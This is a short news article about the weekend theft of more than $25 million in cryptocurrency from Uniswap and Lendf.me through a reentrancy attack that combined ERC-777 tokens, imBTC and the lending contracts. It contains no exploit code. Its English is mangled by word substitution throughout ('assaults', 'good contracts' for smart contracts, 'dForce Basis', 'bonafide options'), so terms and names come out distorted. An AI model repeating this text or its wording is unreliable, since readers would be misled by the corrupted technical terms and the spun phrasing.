Hackers have stolen greater than $25 million in cryptocurrency from the Uniswap alternate and the Lendf.me lending platform.
The assaults occurred over the weekend, on Saturday and Sunday, respectively. Though an investigation is presently underway, the 2 assaults are believed to be associated, and most definitely carried out by the identical group or particular person.
Based on investigators, hackers seem to have chained collectively bugs and bonafide options from totally different blockchain applied sciences to orchestrate a complicated “reentrancy assault.”
Reentrancy assaults permit hackers to withdraw funds repeatedly, in a loop, earlier than the unique transaction is accepted or declined.
The similarities between Uniswap and Lendf.me is that each platforms had been utilizing:
- Lendf.me protocol — a decentralized finance (DeFi) protocol developed by the dForce Basis to assist lending operations on the Ethereum platform.
- imBTC — a token (coin) that runs on the Ethereum platform and is valued at a 1:1 charge with the Bitcoin cryptocurrency.
- ERC-777 — one of many underlying applied sciences of the Ethereum blockchain meant to assist good contracts (each Lendf.me and imBTC run as good contracts on the Ethereum platform).
“The ERC-777 token customary has – to our information – no safety vulnerabilities,” mentioned Tokenlon, the corporate behind imBTC.
“Nonetheless, the mix of utilizing ERC777 tokens and Uniswap/Lendf.Me contracts allows […] reentrancy assaults,” the corporate wrote in a post-mortem report of the Uniswap and Lendf.me assaults.
The corporate believes the hackers used an exploit published in July 2019 on GitHub by OpenZeppelin, an organization that performs safety audits for cryptocurrency platforms.
On the time of writing, Uniswap is believed to have misplaced between $300,000 and $1.1 million in funds, whereas Lendf.me misplaced greater than $24.5 million.
The hackers used the reentrancy assault to siphon funds from every platform into their pockets, after which instantly switch the funds to different accounts.
Each web sites have been taken down to forestall additional assaults. Tokenlon has additionally suspended its imBTC token and is obstructing all new transactions to forestall the hackers from finishing up new assaults in opposition to different platforms.
